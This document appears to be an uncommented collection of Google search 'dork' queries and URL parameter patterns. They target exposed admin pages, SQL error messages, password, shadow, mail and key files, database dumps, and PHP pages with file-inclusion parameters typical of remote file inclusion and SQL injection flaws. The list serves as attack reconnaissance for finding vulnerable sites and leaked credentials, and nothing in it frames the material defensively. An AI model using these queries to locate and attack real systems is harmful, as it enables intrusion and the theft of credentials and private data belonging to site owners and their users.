"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"xampp/phpinfo
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
"You have an error in your SQL syntax near"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
"Your password is * Remember this for later use"
"your password is" filetype:log
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
("Indexed.By"|"Monitored.By") hAcxFtpScan
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
(intitle:"Please login - Forums
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
[WFClient] Password= filetype:ica
*.php?include=
*.php?secc=
********.php?cid=
********s_in_area.php?area_id=
***zine/board.php?board=
*inc*.php?adresa=
*inc*.php?base_dir=
*inc*.php?body=
*inc*.php?c=
*inc*.php?category=
*inc*.php?doshow=
*inc*.php?ev=
*inc*.php?get=
*inc*.php?i=
*inc*.php?inc=
*inc*.php?include=
*inc*.php?j=
*inc*.php?k=
*inc*.php?ki=
*inc*.php?left=
*inc*.php?m=
*inc*.php?menu=
*inc*.php?modo=
*inc*.php?open=
*inc*.php?pg=
*inc*.php?rub=
*inc*.php?sivu=
*inc*.php?start=
*inc*.php?str=
*inc*.php?to=
*inc*.php?type=
*inc*.php?y=
/addpost_newpoll.php?addpoll=preview&thispath=
/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
/app/common/lib/codeBeautifier/Beautifier/Core.php?BEAUT_PATH=
/bz/squito/photolist.inc.php?photoroot=
/class.mysql.php?path_to_bt_dir=
/classes.php?LOCAL_PATH=
/classes/adodbt/sql.php?classes_dir=
/classified_right.php?language_dir=
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
/components/com_cpg/cpg.php?mosConfig_absolute_path=
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
/components/com_facileforms/facileforms.frame.php?ff_compath=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/contrib/yabbse/poc.php?poc_root_path=
/embed/day.php?path=
/extensions/moblog/moblog_lib.php?basedir=
/functions.php?include_path=
/header.php?abspath=
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/include/main.php?config[search_disp]=true&include_dir=
/include/write.php?dir=
/includes/dbal.php?eqdkp_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
/jscript.php?my_ms[root]=
/login.php?dir=
/main.php?sayfa=
/mcf.php?content=
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/agendax/addevent.inc.php?agendax_path=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/My_eGallery/public/displayCategory.php?basepath=
/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
/modules/TotalCalendar/about.php?inc_dir=
/modules/vwar/admin/admin.php?vwar_root=
/modules/vwar/admin/admin.php?vwar_root=index.php?loc=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=
/photoalb/lib/static/header.php?set_menu=
/phpopenchat/contrib/yabbse/poc.php?sourcedir=
/popup_window.php?site_isp_root=
/ppa/inc/functions.inc.php?config[ppa_root_path]=
/skin/zero_vote/error.php?dir=
/sources/functions.php?CONFIG[main_path]=
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=
/sources/template.php?CONFIG[main_path]=
/spid/lang/lang.php?lang_path=
/squirrelcart/cart_content.php?cart_isp_root=
/squito/photolist.inc.php?photoroot=
/surveys/survey.inc.php?path=
/tags.php?BBCodeFile=
/templates/headline_temp.php?nst_inc=
/tools/send_reminders.php?includedir=
/tools/send_reminders.php?includedir= allinurl:day.php?date=
/yabbse/Sources/Packages.php?sourcedir=
/zipndownload.php?PP_PATH=
4images Administration Control Panel
94FBR "ADOBE PHOTOSHOP"
about_us.php?id=
about.php?cartID=
aboutbook.php?id=
aboutchiangmai/details.php?id=
aboutprinter.shtml
abroad/page.php?cid=
accinfo.php?cartId=
acclogin.php?cartID=
add_cart.php?num=
add-to-cart.php?ID=
add.php?bookid=
addcart.php?
addItem.php
addToCart.php?idProduct=
addtomylist.php?ProdId=
admin.php?page=
admin/doeditconfig.php?thispath=../includes&config[path]=
admin/index.php?o=
adminEditProductFields.php?intProdID=
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= allinurl:day.php?date=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGallery/index.php?basepath=
administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /tags.php?BBCodeFile=
administrator/components/com_webring/admin.webring.docs.php?component_dir=
advSearch_h.php?idCategory=
affiliate-agreement.cfm?storeid=
affiliate.php?ID=
affiliates.php?id=
AIM buddy lists
akocomments.php?mosConfig_absolute_path=
aktuelles/meldungen-detail.php?id=
aktuelles/veranstaltungen/detail.php?id=
al_initialize.php?alpath=
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
allintitle: sensitive filetype:doc
allintitle:.."Test page for Apache Installation.."
allintitle:"Network Camera NetworkCamera"
allintitle:"Welcome to the Cyclades"
allintitle:*.php?filename=*
allintitle:*.php?logon=*
allintitle:*.php?page=*
allintitle:admin.php
allinurl: admin mdb
allinurl:.br/index.php?loc=
allinurl:".r{}_vti_cnf/"
allinurl:"exchange/logon.asp"
allinurl:"index.php" "site=sglinks"
allinurl:*.php?txtCodiInfo=
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:admin mdb
allinurl:auth_user_file.txt
allinurl:cdkey.txt
allinurl:control/multiview
allinurl:install/install.php
allinurl:intranet admin
allinurl:servlet/SnoopServlet
allinurl:wps/portal/ login
An unexpected token "END-OF-STATEMENT" was found
Analysis Console for Incident Databases
ancillary.php?ID=
announce.php?id=
answer/default.php?pollID=
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
archive.php?id=
archive/get.php?message_id=
art.php?id=
article_preview.php?id=
article.php?id=
article.php?ID=
articlecategory.php?id=
articles.php?id=
artikelinfo.php?id=
artist_art.php?id=
ASP.login_aspx "ASP.NET_SessionId"
auction/item.php?id=
auth_user_file.txt
authorDetails.php?bookID=
avatar.php?page=
avd_start.php?avd=
band_info.php?id=
base.php?*[*]*=
base.php?abre=
base.php?adresa=
base.php?base_dir=
base.php?basepath=
base.php?body=
base.php?category=
base.php?chapter=
base.php?choix=
base.php?cont=
base.php?disp=
base.php?doshow=
base.php?ev=
base.php?eval=
base.php?filepath=
base.php?home=
base.php?id=
base.php?incl=
base.php?include=
base.php?ir=
base.php?itemnav=
base.php?k=
base.php?ki=
base.php?l=
base.php?lang=
base.php?link=
base.php?loc=
base.php?mid=
base.php?middle=
base.php?middlePart=
base.php?module=
base.php?name=
base.php?numero=
base.php?oldal=
base.php?opcion=
base.php?pa=
base.php?pag=
base.php?pageweb=
base.php?panel=
base.php?path=
base.php?phpbb_root_path=
base.php?play=
base.php?pname=
base.php?rub=
base.php?seccion=
base.php?second=
base.php?seite=
base.php?sekce=
base.php?sivu=
base.php?str=
base.php?subject=
base.php?t=
base.php?texto=
base.php?to=
base.php?v=
base.php?var=
base.php?w=
basket.php?id=
bayer/dtnews.php?id=
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=
bbs/bbsView.php?id=
bbs/view.php?no=
beitrag_D.php?id=
beitrag_F.php?id=
bid/topic.php?TopicID=
big.php?pathtotemplate=
blank.php?abre=
blank.php?action=
blank.php?base_dir=
blank.php?basepath=
blank.php?body=
blank.php?category=
blank.php?channel=
blank.php?corpo=
blank.php?destino=
blank.php?dir=
blank.php?filepath=
blank.php?get=
blank.php?goFile=
blank.php?goto=
blank.php?h=
blank.php?header=
blank.php?id=
blank.php?in=
blank.php?incl=
blank.php?ir=
blank.php?itemnav=
blank.php?j=
blank.php?ki=
blank.php?lang=
blank.php?left=
blank.php?link=
blank.php?loader=
blank.php?menu=
blank.php?mod=
blank.php?name=
blank.php?o=
blank.php?oldal=
blank.php?open=
blank.php?OpenPage=
blank.php?pa=
blank.php?page=
blank.php?pagina=
blank.php?panel=
blank.php?path=
blank.php?phpbb_root_path=
blank.php?pname=
blank.php?pollname=
blank.php?pr=
blank.php?pre=
blank.php?pref=
blank.php?qry=
blank.php?read=
blank.php?ref=
blank.php?rub=
blank.php?section=
blank.php?sivu=
blank.php?sp=
blank.php?strona=
blank.php?subject=
blank.php?t=
blank.php?url=
blank.php?var=
blank.php?where=
blank.php?xlink=
blank.php?z=
blog_detail.php?id=
blog.php?blog=
blog/index.php?idBlog=
board_view.html?id=
board_view.php?s_board_id=
board/board.html?table=
board/kboard.php?board=
board/read.php?tid=
board/showthread.php?t=
board/view_temp.php?table=
board/view.php?no=
boardView.php?bbs=
book_detail.php?BookID=
book_list.php?bookid=
book_view.php?bookid=
book.html?isbn=
Book.php?bookID=
book.php?ID=
book.php?id=
book.php?ISBN=
book.php?isbn=
book/bookcover.php?bookid=
BookDetails.php?ID=
bookDetails.php?id=
bookmark/mybook/bookmark.php?bookPageNo=
bookpage.php?id=
books.php?id=
books/book.php?proj_nr=
bookview.php?id=
bp_ncom.php?bnrep=
bpac/calendar/event.php?id=
brand.php?id=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
browse.php?catid=
browse/book.php?journalID=
browsepr.php?pr=
buy.php?
buy.php?bookid=
buy.php?category=
bycategory.php?id=
calendar/event.php?id=
camera linksys inurl:main.cgi
Canon Webview netcams
cardinfo.php?card=
cart_additem.php?id=
cart_validate.php?id=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart/addToCart.php?cid=
cart/product.php?productid=
cartadd.php?id=
cat.php?cat_id=
cat.php?iCat=
cat/?catid=
catalog_item.php?ID=
catalog_main.php?catid=
catalog.php
catalog.php?CatalogID=
catalog/main.php?cat_id=
catalog/product.php?cat_id=
catalog/product.php?pid=
categories.php?cat=
category_list.php?id=
category.php
category.php?c=
category.php?catid=
category.php?CID=
category.php?cid=
Category.php?cid=
category.php?id_category=
category.php?id=
categorydisplay.php?catid=
cats.php?cat=
cbmer/congres/page.php?LAN=
cei/cedb/projdetail.php?projID=
cemetery.php?id=
CGI:IRC Login
cgiirc.conf
channel_id=
channel/channel-layout.php?objId=
chappies.php?id=
checkout_confirmed.php?order_id=
checkout.php?cartid=
checkout.php?UserID=
checkout1.php?cartid=
clan_page.php?cid=
clanek.php4?id=
classes/adodbt/sql.php?classes_dir=
classifieds/detail.php?siteid=
classifieds/showproduct.php?product=
cloudbank/detail.php?ID=
club.php?cid=
clubpage.php?id=
Coldfusion Error Pages
collectionitem.php?id=
colourpointeducational/more_details.php?id=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
Comersus.mdb database
comments_form.php?ID=
comments.php?id=
communique_detail.php?id=
community/calendar-event-fr.php?id=
components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
components/com_cpg/cpg.php?mosConfig_absolute_path=
components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
components/com_forum/download.php?phpbb_root_path=
components/com_galleria/galleria.html.php?mosConfig_absolute_path=
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=
components/com_performs/performs.php?mosConfig_absolute_path=
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=
components/com_simpleboard/image_upload.php?sbp=
Computer Science.php?id=
confidential site:mil
config.php
config.php?_CCFG[_PKG_PATH_DBSE]=
ConnectionTest.java filetype:html
constructies/product.php?id=
contact.php?cartId=
contacts ext:wml
contenido.php?sec=
content.php?arti_id=
content.php?categoryId=
content.php?cID=
content.php?cid=
content.php?cont_title=
content.php?id
content.php?id=
content.php?ID=
content.php?p=
content.php?page=
content.php?PID=
content/conference_register.php?ID=
content/detail.php?id=
content/index.php?id=
content/pages/index.php?id_cat=
content/programme.php?ID=
content/view.php?id=
coppercop/theme.php?THEME_DIR=
corporate/newsreleases_more.php?id=
county-facts/diary/vcsgen.php?id=
cps/rde/xchg/tm/hs.xsl/liens_detail.html?lnkId=
cryolab/content.php?cid=
csc/news-details.php?cat=
customer/board.htm?mode=
customer/home.php?cat=
customerService.php?****ID1=
CuteNews" "2003..2005 CutePHP"
data filetype:mdb -site:gov -site:mil
db.php?path_local=
db/CART/product_details.php?product_id=
de/content.php?page_id=
deal_coupon.php?cat_id=
debate-detail.php?id=
declaration_more.php?decl_id=
default.php?*root*=
default.php?abre=
default.php?base_dir=
default.php?basepath=
default.php?body=
default.php?catID=
default.php?channel=
default.php?chapter=
default.php?choix=
default.php?cmd=
default.php?cont=
default.php?cPath=
default.php?destino=
default.php?e=
default.php?eval=
default.php?f=
default.php?goto=
default.php?header=
default.php?inc=
default.php?incl=
default.php?include=
default.php?index=
default.php?ir=
default.php?itemnav=
default.php?k=
default.php?ki=
default.php?l=
default.php?left=
default.php?load=
default.php?loader=
default.php?loc=
default.php?m=
default.php?menu=
default.php?menue=
default.php?mid=
default.php?mod=
default.php?module=
default.php?n=
default.php?name=
default.php?nivel=
default.php?oldal=
default.php?opcion=
default.php?option=
default.php?p=
default.php?pa=
default.php?pag=
default.php?page=
default.php?pageweb=
default.php?panel=
default.php?param=
default.php?play=
default.php?pr=
default.php?pre=
default.php?read=
default.php?ref=
default.php?rub=
default.php?secao=
default.php?secc=
default.php?seccion=
default.php?seite=
default.php?showpage=
default.php?sivu=
default.php?sp=
default.php?str=
default.php?strona=
default.php?t=
default.php?thispage=
default.php?TID=
default.php?tipo=
default.php?to=
default.php?type=
default.php?v=
default.php?var=
default.php?x=
default.php?y=
description.php?bookid=
designcenter/item.php?id=
detail.php?id=
detail.php?ID=
detail.php?item_id=
detail.php?prodid=
detail.php?prodID=
detail.php?siteid=
detailedbook.php?isbn=
details.php?BookID=
details.php?id=
details.php?Press_Release_ID=
details.php?prodId=
details.php?ProdID=
details.php?prodID=
details.php?Product_ID=
details.php?Service_ID=
directory/contenu.php?id_cat=
discussions/10/9/?CategoryID=
display_item.php?id=
display_page.php?id=
display.php?ID=
displayArticleB.php?id=
displayproducts.php
displayrange.php?rangeid=
docDetail.aspx?chnum=
down*.php?action=
down*.php?addr=
down*.php?channel=
down*.php?choix=
down*.php?cmd=
down*.php?corpo=
down*.php?disp=
down*.php?doshow=
down*.php?ev=
down*.php?filepath=
down*.php?goFile=
down*.php?home=
down*.php?in=
down*.php?inc=
down*.php?incl=
down*.php?include=
down*.php?ir=
down*.php?lang=
down*.php?left=
down*.php?nivel=
down*.php?oldal=
down*.php?open=
down*.php?OpenPage=
down*.php?pa=
down*.php?pag=
down*.php?pageweb=
down*.php?param=
down*.php?path=
down*.php?pg=
down*.php?phpbb_root_path=
down*.php?pollname=
down*.php?pr=
down*.php?pre=
down*.php?qry=
down*.php?r=
down*.php?read=
down*.php?s=
down*.php?second=
down*.php?section=
down*.php?seite=
down*.php?showpage=
down*.php?sp=
down*.php?strona=
down*.php?subject=
down*.php?t=
down*.php?texto=
down*.php?to=
down*.php?u=
down*.php?url=
down*.php?v=
down*.php?where=
down*.php?x=
down*.php?z=
download.php?id=
downloads_info.php?id=
downloads.php?id=
downloads/category.php?c=
downloads/shambler.php?id=
downloadTrial.php?intProdID=
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
Dudirectory" -site:duware.com
dudownload" -site:duware.com
DUpaypal" -site:duware.com
DWMail" password intitle:dwmail
e_board/modifyform.html?code=
edatabase/home.php?cat=
edition.php?area_id=
education/content.php?page=
eggdrop filetype:user user
Elite Forum Version *.*"
els_/product/product.php?id=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
en/main.php?id=
en/news/fullnews.php?newsid=
en/publications.php?id=
enable password | secret "current configuration" -intext:the
enc/content.php?Home_Path=
eng_board/view.php?T****=
eng/rgboard/view.php?&bbs_id=
english/board/view****.php?code=
english/fonction/print.php?id=
english/print.php?id=
english/publicproducts.php?groupid=
enter.php?a=
enter.php?abre=
enter.php?addr=
enter.php?b=
enter.php?base_dir=
enter.php?body=
enter.php?chapter=
enter.php?cmd=
enter.php?content=
enter.php?e=
enter.php?ev=
enter.php?get=
enter.php?go=
enter.php?goto=
enter.php?home=
enter.php?id=
enter.php?incl=
enter.php?include=
enter.php?index=
enter.php?ir=
enter.php?itemnav=
enter.php?lang=
enter.php?left=
enter.php?link=
enter.php?loader=
enter.php?menue=
enter.php?mid=
enter.php?middle=
enter.php?mod=
enter.php?module=
enter.php?name=
enter.php?numero=
enter.php?open=
enter.php?pa=
enter.php?page=
enter.php?pagina=
enter.php?panel=
enter.php?path=
enter.php?pg=
enter.php?phpbb_root_path=
enter.php?play=
enter.php?pname=
enter.php?pr=
enter.php?pref=
enter.php?qry=
enter.php?r=
enter.php?read=
enter.php?ref=
enter.php?s=
enter.php?sec=
enter.php?second=
enter.php?seite=
enter.php?sivu=
enter.php?sp=
enter.php?start=
enter.php?str=
enter.php?strona=
enter.php?subject=
enter.php?texto=
enter.php?thispage=
enter.php?type=
enter.php?viewpage=
enter.php?w=
enter.php?y=
etc (index.of)
event_details.php?id=
event_info.php?p=
event.php?id=
events?id=
events.php?ID=
events/detail.php?ID=
events/event_detail.php?id=
events/event.php?id=
events/event.php?ID=
events/index.php?id=
events/unique_event.php?ID=
exhibition_overview.php?id=
exhibitions/detail.php?id=
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cfg radius.cfg
ext:cgi intext:"nrg-" " This web page was created on "
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini intext:env.ini
ext:ini Version=4.0.0.4 password
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:passwd -intext:the -sample -example
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:txt inurl:unattend.txt
ext:vmdk vmdk
ext:vmx vmx
ext:yml database inurl:config
ez Publish administration
faq_list.php?id=
faq.php?cartID=
faq2.php?id=
faqs.php?id=
fatcat/home.php?view=
feature.php?id=
features/view.php?id=
feedback.php?title=
fellows.php?id=
FernandFaerie/index.php?c=
fiche_spectacle.php?id=
Fichier contenant des informations sur le r?seau :
file.php?action=
file.php?basepath=
file.php?body=
file.php?channel=
file.php?chapter=
file.php?choix=
file.php?cmd=
file.php?cont=
file.php?corpo=
file.php?disp=
file.php?doshow=
file.php?ev=
file.php?eval=
file.php?get=
file.php?id=
file.php?inc=
file.php?incl=
file.php?include=
file.php?index=
file.php?ir=
file.php?ki=
file.php?left=
file.php?load=
file.php?loader=
file.php?middle=
file.php?modo=
file.php?n=
file.php?nivel=
file.php?numero=
file.php?oldal=
file.php?pagina=
file.php?param=
file.php?pg=
file.php?play=
file.php?pollname=
file.php?pref=
file.php?q=
file.php?qry=
file.php?ref=
file.php?seccion=
file.php?second=
file.php?showpage=
file.php?sivu=
file.php?sp=
file.php?start=
file.php?strona=
file.php?texto=
file.php?to=
file.php?type=
file.php?url=
file.php?var=
file.php?viewpage=
file.php?where=
file.php?y=
filemanager.php?delete=
filetype:asp "Custom Error Message" Category Source
filetype:asp + "[ODBC SQL"
filetype:ASP ASP
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:ASPX ASPX
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:BML BML
filetype:cfg auto_inst.cfg
filetype:cfg ks intext:rootpw -sample -test -howto
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:CFM CFM
filetype:CGI CGI
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:conf inurl:psybnc.conf "USER.PASS="
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:dat "password.dat
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:DIFF DIFF
filetype:DLL DLL
filetype:DOC DOC
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:FCGI FCGI
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:HTM HTM
filetype:HTML HTML
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf inurl:capolicy.inf
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:JHTML JHTML
filetype:JSP JSP
filetype:ldb admin
filetype:lic lic intext:key
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:log "See `ipsec --copyright"
filetype:log access.log -CVS
filetype:log cron.log
filetype:log intext:"ConnectionManager2"
filetype:log inurl:"password.log"
filetype:log inurl:password.log
filetype:mbx mbx intext:Subject
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:MV MV
filetype:myd myd -CVS
filetype:netrc password
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pass pass intext:userid
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:pdf "Assessment Report" nessus
filetype:PDF PDF
filetype:pem intext:private
filetype:php inurl:"logging.php" "Discuz" error
filetype:php inurl:"webeditor.php"
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:php inurl:vAuthenticate
filetype:PHP PHP
filetype:PHP3 PHP3
filetype:PHP4 PHP4
filetype:PHTML PHTML
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:pl intitle:"Ultraboard Setup"
filetype:PL PL
filetype:pot inurl:john.pot
filetype:PPT PPT
filetype:properties inurl:db intext:password
filetype:PS ps
filetype:PS PS
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:pwd service
filetype:pwl pwl
filetype:qbb qbb
filetype:QBW qbw
filetype:r2w r2w
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:SHTML SHTML
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:STM STM
filetype:SWF SWF
filetype:TXT TXT
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:vcs vcs
filetype:vsd vsd network -samples -examples
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
filetype:xls username password email
filetype:XLS XLS
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
folder.php?id=
forum_bds.php?num=
forum.php?act=
forum/profile.php?id=
forum/showProfile.php?id=
fr/commande-liste-categorie.php?panier=
free_board/board_view.html?page=
freedownload.php?bookid=
front/bin/forumview.phtml?bbcode=
frontend/category.php?id_category=
fshstatistic/index.php?PID=
fullDisplay.php?item=
FullStory.php?Id=
galerie.php?cid=
Gallery in configuration mode
gallery.php?*[*]*=
gallery.php?abre=
gallery.php?action=
gallery.php?addr=
gallery.php?base_dir=
gallery.php?basepath=
gallery.php?chapter=
gallery.php?cont=
gallery.php?corpo=
gallery.php?disp=
gallery.php?ev=
gallery.php?eval=
gallery.php?filepath=
gallery.php?get=
gallery.php?go=
gallery.php?h=
gallery.php?id=
gallery.php?index=
gallery.php?itemnav=
gallery.php?ki=
gallery.php?left=
gallery.php?loader=
gallery.php?menu=
gallery.php?menue=
gallery.php?mid=
gallery.php?mod=
gallery.php?module=
gallery.php?my=
gallery.php?name=
gallery.php?nivel=
gallery.php?oldal=
gallery.php?open=
gallery.php?option=
gallery.php?pag=
gallery.php?page=
gallery.php?pageweb=
gallery.php?panel=
gallery.php?param=
gallery.php?pg=
gallery.php?phpbb_root_path=
gallery.php?pname=
gallery.php?pollname=
gallery.php?pre=
gallery.php?pref=
gallery.php?qry=
gallery.php?redirect=
gallery.php?ref=
gallery.php?rub=
gallery.php?sec=
gallery.php?secao=
gallery.php?seccion=
gallery.php?seite=
gallery.php?showpage=
gallery.php?sivu=
gallery.php?sp=
gallery.php?strona=
gallery.php?thispage=
gallery.php?tipo=
gallery.php?to=
gallery.php?url=
gallery.php?var=
gallery.php?viewpage=
gallery.php?where=
gallery.php?xlink=
gallery.php?y=
gallery/detail.php?ID=
gallery/gallery.php?id=
gallerysort.php?iid=
game.php?id=
games.php?id=
Ganglia Cluster Reports
garden_equipment/Fruit-Cage/product.php?pr=
garden_equipment/pest-weed-control/product.php?pr=
gb/comment.php?gb_id=
general.php?abre=
general.php?addr=
general.php?adresa=
general.php?b=
general.php?base_dir=
general.php?body=
general.php?channel=
general.php?chapter=
general.php?choix=
general.php?cmd=
general.php?content=
general.php?doshow=
general.php?e=
general.php?f=
general.php?get=
general.php?goto=
general.php?header=
general.php?id=
general.php?inc=
general.php?include=
general.php?ir=
general.php?itemnav=
general.php?left=
general.php?link=
general.php?menu=
general.php?menue=
general.php?mid=
general.php?middle=
general.php?modo=
general.php?module=
general.php?my=
general.php?name=
general.php?nivel=
general.php?opcion=
general.php?p=
general.php?page=
general.php?pageweb=
general.php?pollname=
general.php?pr=
general.php?pre=
general.php?qry=
general.php?read=
general.php?redirect=
general.php?ref=
general.php?rub=
general.php?secao=
general.php?seccion=
general.php?second=
general.php?section=
general.php?seite=
general.php?sekce=
general.php?sivu=
general.php?strona=
general.php?subject=
general.php?texto=
general.php?thispage=
general.php?tipo=
general.php?to=
general.php?type=
general.php?var=
general.php?w=
general.php?where=
general.php?xlink=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
gig.php?id=
global_projects.php?cid=
global/product/product.php?gubun=
gnu/?doc=
goboard/front/board_view.php?code=
goods_detail.php?data=
haccess.ctl (one way)
haccess.ctl (VERY reliable)
hall.php?file=
hall.php?page=
Hassan Consulting's Shopping Cart Version 1.18
head.php?*[*]*=
head.php?abre=
head.php?adresa=
head.php?b=
head.php?base_dir=
head.php?c=
head.php?choix=
head.php?cmd=
head.php?content=
head.php?corpo=
head.php?d=
head.php?dir=
head.php?disp=
head.php?ev=
head.php?filepath=
head.php?g=
head.php?goto=
head.php?inc=
head.php?incl=
head.php?include=
head.php?index=
head.php?ir=
head.php?ki=
head.php?lang=
head.php?left=
head.php?load=
head.php?loader=
head.php?loc=
head.php?middle=
head.php?middlePart=
head.php?mod=
head.php?modo=
